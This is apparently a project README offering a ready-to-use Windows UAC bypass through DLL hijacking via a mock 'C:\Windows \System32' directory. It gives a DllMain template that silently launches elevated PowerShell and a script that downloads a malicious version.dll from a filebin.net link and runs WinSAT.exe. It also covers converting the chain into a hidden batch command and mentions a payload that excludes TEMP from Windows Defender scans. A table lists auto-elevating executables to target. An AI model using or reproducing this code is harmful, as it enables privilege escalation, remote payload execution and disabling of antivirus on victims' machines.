Powershell UAC bypass

Originally discovered by Daniel Gebert

Table of Contents

Deployment
Explanations
Auto elavate applications

Deployment

First edit the file to download your malicous DLL from Filebin
To easiliy create said DLL - I would modify This template with the code below

dllmain.c

#include "pch.h"
#include "prxdll.h"
#include "windows.h"
BOOL APIENTRY DllMain(
	const HINSTANCE instance,
	const DWORD reason,
	const PVOID reserved)
{
	switch (reason) {
	case DLL_PROCESS_ATTACH:
		WinExec("powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command \"Start-Process -verb runas powershell\" \"'-NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command YOURPOWERSHELLCOMMANDHERE\" '\"", 1);
		DisableThreadLibraryCalls(instance);
		return prx_attach(instance);
	case DLL_PROCESS_DETACH:
		prx_detach(reserved);
		break;
	}
	return TRUE;
}

This should execute some powershell code as admin.
Next we need to find some autoelavate applications. I prefer to use winSAT.exe as there is no visual GUI when ran. Heres some other Auto elavate applications.

Okay so the you need to edit the powershell source code

New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
copy C:\Windows\System32\WinSAT.exe "C:\windows \System32\winSAT.exe"
Invoke-WebRequest -Uri 'https://filebin.net/bajzrgruy6h83o4n/version.dll' -OutFile 'version.dll'
Start-Process -Filepath 'C:\windows \System32\winSAT.exe'
Start-Sleep -s 1
Remove-Item '\\?\C:\Windows \' -Force -Recurse

First modification:
Build your DLL using visual studio code and upload it to filebin. My DLL adds a windows defender preference to not scan the TEMP directory
Replace the Invoke-WebRequest Uri with your link and replace the copy argument with the location of your windows application.
Now for the final step - Replace every new line with a semicolon and convert it into a batch script

powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "Yourcodehere"

And boom! You can execute that system command bypass UAC!

Remember - you can program this into most high level languages - as all you need to do is execute a system command!

Explanations

What Is UAC

Microsoft introduced UAC (User Account Control) with Windows Vista and Windows Server 2008.
In short terms - UAC aims to improve the security of Microsoft Windows by giving programs standard user privileges until an administrator authorizes an increase or elevation of permissions. Wikipedia

DLL Hijacking

DLL Hijacking means a program will load and execute a malicious DLL contained in the same folder as a data file opened by these programs. Wikipedia

Mock directories

Heres a description I stole from daniels blog

Mock directories are folders with a trailing space. For example \

C:\Windows \System32

See the space " " between "Windows" and "\System32".\

Auto elavate applications

Executable	DLL	Comment
ComputerDefaults.exe	profapi.dll	Can also bypass UAC using other methods.
EASPolicyManagerBrokerHost.exe	profapi.dll
fodhelper.exe	profapi.dll	Opens settings and can be used to bypass UAC using other methods
FXSUNATD.exe	version.dll
msconfig.exe	version.dll	Can also bypass UAC using other methods
OptionalFeatures.exe	profapi.dll	Opens Windows Optional Features
sdclt.exe	profapi.dll	Can also bypass UAC using other methods; opens Windows Backup
ServerManager.exe	profapi.dll	ServerManager.exe is not present by default
systemreset.exe	version.dll
sysprep.exe	version.dll	Creates sub folder. Sysprep process has to be killed directly after UAC bypass, otherwise sysprep is executed!
SystemSettingsAdminFlows.exe	version.dll
WinSAT.exe	version.dll
WSReset.exe	profapi.dll	Opens Windows Store